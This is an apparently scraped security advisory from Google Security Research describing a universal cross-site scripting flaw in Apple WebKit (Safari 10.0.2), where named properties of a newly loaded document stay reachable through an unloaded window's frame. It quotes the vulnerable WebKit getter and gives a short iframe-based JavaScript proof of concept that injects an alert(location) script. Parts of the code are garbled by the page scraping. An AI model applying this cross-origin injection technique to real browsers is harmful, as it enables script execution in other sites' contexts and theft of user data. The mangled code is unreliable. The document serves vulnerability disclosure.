Apple Webkit Named Property UXSS

Type packetstorm
Reporter Google Security Research
Modified 2017-04-09T00:00:00


                                            ` Apple Webkit: UXSS by accessing a named property from an unloaded window   
The frame is not detached from an unloaded window. We can access to the new document's named properties via the following function.  
static bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetter(JSDOMWindowProperties* thisObject, Frame& frame, ExecState* exec, PropertyName propertyName, PropertySlot& slot)  
Document* document = frame.document(); <<-------- the new document.  
if (is<HTMLDocument>(*document)) {  
auto& htmlDocument = downcast<HTMLDocument>(*document);  
auto* atomicPropertyName = propertyName.publicName();  
if (atomicPropertyName && htmlDocument.hasWindowNamedItem(*atomicPropertyName)) {  
JSValue namedItem;  
if (UNLIKELY(htmlDocument.windowNamedItemContainsMultipleElements(*atomicPropertyName))) {  
Ref<HTMLCollection> collection = document->windowNamedItems(atomicPropertyName);  
ASSERT(collection->length() > 1);  
namedItem = toJS(exec, thisObject->globalObject(), collection);  
} else  
namedItem = toJS(exec, thisObject->globalObject(), htmlDocument.windowNamedItem(*atomicPropertyName));  
slot.setValue(thisObject, ReadOnly | DontDelete | DontEnum, namedItem);  
return true;  
return false;  
"use strict";  
let f = document.body.appendChild(document.createElement("iframe"));  
let get_element = f.contentWindow.Function("return logo;");  
f.onload = () => {  
f.onload = null;  
let node = get_element();  
var sc = document.createElement("script");  
sc.innerText = "alert(location)";  
f.src = "<a href="";" title="" class="" rel="nofollow">";</a>  
Tested on Safari 10.0.2(12602.  
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
Found by: lokihardt